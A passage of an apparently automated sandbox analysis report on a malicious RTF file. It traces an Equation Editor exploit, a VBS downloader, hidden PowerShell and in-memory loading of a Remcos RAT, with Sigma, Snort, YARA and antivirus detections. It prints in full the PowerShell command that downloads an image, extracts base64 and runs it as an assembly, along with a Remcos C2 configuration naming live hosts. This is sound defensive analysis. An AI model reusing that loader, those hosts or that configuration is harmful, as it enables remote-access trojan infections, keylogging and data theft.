= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs
                      Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 152, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs" , ProcessId: 3148, ProcessName: wscript.exe
                      Sigma detected: Modification of IE Registry Settings
                      Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 152, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                      Sigma detected: Non Interactive PowerShell Process Spawned
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
                      Sigma detected: Office Macro File Creation
                      Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 1892, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                      Sigma detected: PowerShell Script Dropped Via PowerShell.EXE
                      Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3428, TargetFilename: C:\Users\user\AppData\Local\Temp\iuqdab5m.hza.ps1

                      Data Obfuscation

                      barindex
                      Sigma detected: Powershell download and load assembly
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.MRHH/88082/6.13.271.701//:ptth' , '1' , 'C:\ProgramData\' , 'antre','RegAsm',''))} }", CommandLine|base64offs

                      Stealing of Sensitive Information

                      barindex
                      Sigma detected: Remcos
                      Source: Registry Key setAuthor: Joe Security: Data: Details: CC C0 05 F8 36 77 FF 59 27 3F 52 CE FC 6B 29 F4 01 51 C6 7F D4 F9 81 6A A4 65 7F 05 A3 94 9F E7 97 F1 FE 17 20 A1 AD 1D 85 9E 4E 18 7D 5C 23 79 AD E1 C1 0E 06 23 D4 2A 0B 82 5C BA BD 87 A8 1F E6 3B 36 83 8F E7 02 1D C7 DD 21 B7 96 67 AA 0D B6 E4 7B EA 7A 65 6B D5 78 8A 95 65 C7 B4 90 4A 85 E2 73 85 16 4A 78 E7 49 AF 8E 2F 63 5C F9 16 16 23 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, ProcessId: 3800, TargetObject: HKEY_CURRENT_USER\Software\Rmc-999Z97\exepath

                      Snort Signatures

                      Timestamp:05/01/24-14:55:30.813240
                      SID:2018856
                      Source Port:443
                      Destination Port:49168
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/01/24-14:55:30.813240
                      SID:2047750
                      Source Port:443
                      Destination Port:49168
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/01/24-14:55:31.602932
                      SID:2025011
                      Source Port:443
                      Destination Port:49168
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/01/24-14:55:44.958525
                      SID:2020424
                      Source Port:80
                      Destination Port:49169
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/01/24-14:55:31.605872
                      SID:2049038
                      Source Port:443
                      Destination Port:49168
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:05/01/24-14:55:44.958525
                      SID:2020423
                      Source Port:80
                      Destination Port:49169
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus / Scanner detection for submitted sample
                      Source: nU7Z8sPyvf.rtfAvira: detected
                      Antivirus detection for URL or domain
                      Source: http://geoplugin.net/json.gpURL Reputation: Label: phishing
                      Source: http://geoplugin.net/json.gp/CURL Reputation: Label: phishing
                      Source: sembe.duckdns.orgAvira URL Cloud: Label: malware
                      Found malware configuration
                      Source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "sembe.duckdns.org:14645:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-999Z97", "Keylog flag": "1", "Keylog path": "Temp", "Keylog file": "nots.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                      Multi AV Scanner detection for domain / URL
                      Source: sembe.duckdns.orgVirustotal: Detection: 11%Perma Link
                      Source: uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
                      Source: https://uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
                      Source: sembe.duckdns.orgVirustotal: Detection: 11%Perma Link
                      Source: https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029Virustotal: Detection: 14%Perma Link
                      Multi AV Scanner detection for submitted file
                      Source: nU7Z8sPyvf.rtfReversingLabs: Detection: 63%
                      Source: nU7Z8sPyvf.rtfVirustotal: Detection: 56%Perma Link
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.628166706.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\note\nots.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,15_2_00433837
                      Source: powershell.exe, 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_74e94242-6

                      Exploits

                      barindex
                      Yara detected UAC Bypass using CMSTP
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.powershell.exe.4449110.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.627492165.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.446552841.0000000004266000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3544, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 3800, type: MEMORYSTR
                      Office equation editor establishes network connection
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 107.172.31.6 Port: 80Jump to behavior
                      Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exeJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

                      Privilege Escalation

                      barindex
                      Contains functionality to bypass UAC (CMSTPLUA)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004074FD _wcslen,CoGetObject,15_2_004074FD
                      Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.22:49167 version: TLS 1.0
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.22:49166 version: TLS 1.2
                      Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.00000000040C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\System.Management.Automation Controle Financeiro Rump fix\obj\Debug\net20\System.Management.Automation.pdbSHA256n source: powershell.exe, 0000000A.00000002.492134092.00000000091E0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.446552841.00000000040C9000.00000004.00000800.00020000.00000000.sdmp

                      Spreading

                      barindex
                      Yara detected VBS Downloader Generic
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\coinfishingusagegirlsknow.vbs, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\indexphppagenotfound[1].gif, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409253
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,15_2_0041C291
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,15_2_0040C34D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,15_2_00409665
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0044E879 FindFirstFileExA,15_2_0044E879
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,15_2_0040880C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040783C FindFirstFileW,FindNextFileW,15_2_0040783C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,15_2_00419AF5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,15_2_0040BB30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,15_2_0040BD37
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,15_2_00407C97
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior

                      Software Vulnerabilities

                      barindex
                      Document exploit detected (process start blacklist hit)
                      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                      Shellcode detected
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C059D ExitProcess,2_2_035C059D
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C054A URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035C054A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C0578 ShellExecuteW,ExitProcess,2_2_035C0578
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C04B9 LoadLibraryW,2_2_035C04B9
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035C0563 ShellExecuteW,ExitProcess,2_2_035C0563
                      Suspicious execution chain found
                      Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      Source: global trafficDNS query: name: paste.ee
                      Source: global trafficDNS query: name: uploaddeimagens.com.br
                      Source: global trafficDNS query: name: sembe.duckdns.org
                      Source: global trafficDNS query: name: geoplugin.net
                      Source: global trafficDNS query: name: geoplugin.net
                      Source: global trafficDNS query: name: geoplugin.net
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49168 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49165 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49169 -> 107.172.31.6:80
                      Source: global trafficTCP traffic: 192.168.2.22:49171 -> 178.237.33.50:80
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49166 -> 104.21.84.67:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
                      Source: global trafficTCP traffic: 192.168.2.22:49167 -> 172.67.215.45:443
